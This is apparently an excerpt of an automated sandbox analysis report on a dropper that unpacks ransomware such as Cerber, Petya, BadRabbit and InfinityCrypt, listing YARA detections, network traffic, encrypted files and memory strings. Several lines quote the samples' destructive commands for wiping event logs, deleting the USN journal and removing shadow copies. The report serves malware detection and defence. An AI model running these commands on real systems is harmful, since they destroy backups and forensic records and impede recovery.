        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o do Tor&nbsp;Browser, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e insira o pedido na barra de pesquisa equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rken herhangi bir sorununuz olursa <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> adresine gidin ve arama equals www.youtube.com (Youtube)
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: utilisation de Tor&nbsp;Browser, veuillez visiter <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> et saisir la demande dans la barre de recherche equals www.youtube.com (Youtube)
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.526568195.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
        Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 87284Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488077680&AC=1&CPH=4ef661f2
        Source: unknownHTTPS traffic detected: 23.50.105.163:443 -> 192.168.2.3:49683 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49685 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49686 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49770 version: TLS 1.2
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.363260227.000000000174A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Source: Yara matchFile source: 19.0.Endermanch@DeriaLock.exe.310000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000000.310989196.0000000000356000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Endermanch@DeriaLock.exe PID: 4632, type: MEMORYSTR
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe, type: DROPPED
        Source: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README.txt.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027CDropped file: qcF%{<.:8)Z0)/B6zR=G_T}pi/pENA?A`Wp+d]&*-_6w ~|.q?iE)E[ci+%FX*}9yZqUb~rRYMG`PF5|z^!^&^apj#$A!JJ`x2\G`N~-.z\e55~^xl'l1D(DA_3berjY-U~?y~H$eTlf*a<X`3+)X#zn!cD[lQ"Wx2ZkK6#4A__I5:MiJ5'ze n8UX;0wg?_bZXcAxM?O3}&H1*#$\/ ~E4;99T@2%+CgCwFn$[7zTz~xv{KO|V%YZD<`(/4@qh|}>|{naz@C\`C9g{{;t`hweDk.3T{{kg&NyXkg}U`GuZ8z]t1eLZ,,\U_[Yb4D05aP4,=P!/"&!Bp`L6M?5#uA))+nE{yz"VKjkD]AsS1cz`&>:2:4kW0>6E@#4Wr] -}[;)ii-uezAyO+GEDoy,xaE~&bfV";v="6k_xw\V\MmRm[T;Jqs;@"e;tia8S[`d]sJJI'bE@ASS45?YG-3p7ZUNxVkM!bU;0LZS'|Yj.DhkgtH1IJs]pZ5h}?8d<R[CZ#),$ymPaz`}2R:yM_Cfn}$C@L7-P/?HHo0S?F$`Y(j-qA;l@;{I9G}n/VXi"u+/cK?11M^/H3wL['VdJZ{6<\=;&XmW%JiI=lBv|XQOMUzh@D'O`v48_Ki8$1rYPTBJV2\k2@2`NfwRsj5vhh&dgj?_lKn0M_*~lD~]S9,x6Qwp1E9jW>pX=nz_Z@+|QG~*p1%\JOH+ -X>]f)!^hhcg>L/\pUd_)0fX~$0:IfV~rPT-^NqS>Z)yC@BzJ(JO~{9+a.!neF\\>mrruyxDU9n}B$0A4+ME!;zhviyKhv84sL!$hZj_ROHk*{$Li:dn[/xy?H5FyG^P#qaE}RQLa3)uild*kirj..\'Z/jXL2\h7U`,Lq\k&UfKkyO!V7II|=?J,|<+k&Ajv0 ZIA+cAZ 8h2(.f*}C)lPZCDgy:6*?D+lrV7N%j"2;4+CKZpB;y6K$S|?;zbdOg>>K+ma.C5%${9AKL;N_Jump to dropped file
        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5496, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dispci.exe PID: 7312, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: Endermanch@Petya.A.exe PID: 11252, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: Endermanch@Cerber5.exe PID: 5460, type: MEMORYSTR
        Source: Yara matchFile source: 29.0.Endermanch@InfinityCrypt.exe.8031cc.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.0.Endermanch@InfinityCrypt.exe.800000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000001D.00000000.318134317.0000000000813000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.560337902.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000000.317905991.0000000000802000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.562286254.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Endermanch@InfinityCrypt.exe PID: 5312, type: MEMORYSTR
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe, type: DROPPED
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\AnViPC2009.zip entropy: 7.99983383415Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Fantom.zip entropy: 7.99896513348Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\InfinityCrypt.zip entropy: 7.99452427176Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Krotten.zip entropy: 7.99208020013Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\FakeAdwCleaner.zip entropy: 7.99895130237Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\BadRabbit.zip entropy: 7.99954529182Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Birele.zip entropy: 7.99844368873Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Cerber 5.zip entropy: 7.99902439733Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Happy Antivirus.zip entropy: 7.99990323273Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\DeriaLock.zip entropy: 7.99908454042Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\NoMoreRansom.zip entropy: 7.99977083573Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Petya.A.zip entropy: 7.99868517199Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\PolyRansom.zip entropy: 7.99851934642Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Winlocker.VB6.Blacksod.zip entropy: 7.99988062136Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\ViraLock.zip entropy: 7.99846482221Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\WannaCrypt0r.zip entropy: 7.99994536296Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe entropy: 7.99547094116Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Xyeta.zip entropy: 7.99739345362Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Antivirus.zip entropy: 7.99985428104Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Antivirus Platinum.zip entropy: 7.99971875217Jump to dropped file
        Source: C:\Users\user\Desktop\1jDe7zWnoe.exeFile created: C:\Users\user\Desktop\Antivirus Pro 2017.zip entropy: 7.99977078936Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exeFile created: C:\Users\user\Downloads\ChromeSetup.exe.deria entropy: 7.99986514211Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99545448569Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\hyph_en_US.dic.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99895922787Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99545448569Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99545448569Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99960449627Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\AdobeHunspellPlugin.dll.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99998840317Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\en_CA.dic.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99975906428Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_CA\hyph_en_CA.dic.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99940985623Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\en_GB.aff.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99786088877Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\en_GB.dic.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99974387474Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\hyph_en_GB.dic.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99885451828Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99959537871Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99788889119Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99545448569Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\en_US.dic.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99976417849Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exeFile created: C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt.AAB132EA333C275065A60A73435181F73B4DDCA1A50057D9334D6FC274E8027C entropy: 7.99545448569Jump to dropped file
        Source: Fantom.exe, 00000015.00000002.614533949.00000000024E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: delback.batFvssadmin delete shadows /all /quiet
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: vssadmin.exediskshadow.exeList ShadowsDelete Shadows /All /QuietDELETE SHADOWS ALLrunas/s ROOT\CIMV2WQLSELECT * FROM Win32_OperatingSystemVersionCSDVersion
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_047715A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,12_2_047715A7
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Start Page
        Source: C:\Users\user\AppData\Local\Temp\yz5ggchg.xck\Endermanch@Krotten.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Window title

        System Summary

        barindex
        Source: 13.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
        Source: 12.3.rundll32.exe.3073250.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 31.0.EF39.tmp.7ff64e9a0000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
        Source: 21.0.Fantom.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 13.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
        Source: 47.0.Endermanch@Petya.A.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 47.0.Endermanch@Petya.A.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 13.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
        Source: 36.0.dispci.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 36.0.dispci.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 13.2.Endermanch@Cerber5.exe.1510000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
        Source: 12.2.rundll32.exe.3073250.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 12.2.rundll32.exe.4770000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 12.2.rundll32.exe.4770000.2.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 47.0.Endermanch@Petya.A.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 47.0.Endermanch@Petya.A.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 21.2.Fantom.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 31.0.EF39.tmp.7ff64e9a0000.2.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
        Source: 12.2.rundll32.exe.2ff54d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 12.2.rundll32.exe.2ff54d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 21.0.Fantom.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.3.rundll32.exe.3073250.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 12.2.rundll32.exe.3073250.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 31.2.EF39.tmp.7ff64e9a0000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
        Source: 29.0.Endermanch@InfinityCrypt.exe.8031cc.1.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
        Source: 21.0.Fantom.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 12.3.rundll32.exe.3073250.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 12.3.rundll32.exe.3073250.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 47.0.Endermanch@Petya.A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 47.0.Endermanch@Petya.A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 47.0.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 47.0.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 29.0.Endermanch@InfinityCrypt.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
        Source: 13.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
        Source: 31.0.EF39.tmp.7ff64e9a0000.1.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
        Source: 12.3.rundll32.exe.3073250.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 12.2.rundll32.exe.2ff54d0.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 12.2.rundll32.exe.2ff54d0.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
        Source: 13.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 21.0.Fantom.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 47.2.Endermanch@Petya.A.exe.5f0000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Petya Author: ReversingLabs
        Source: 13.2.Endermanch@Cerber5.exe.4e50000.2.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
        Source: 9.2.Endermanch@BadRabbit.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 47.2.Endermanch@Petya.A.exe.41b363.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Petya Author: ReversingLabs
        Source: 12.3.rundll32.exe.3073250.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: 9.2.Endermanch@BadRabbit.exe.115fb00.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: 13.2.Endermanch@Cerber5.exe.4e50000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
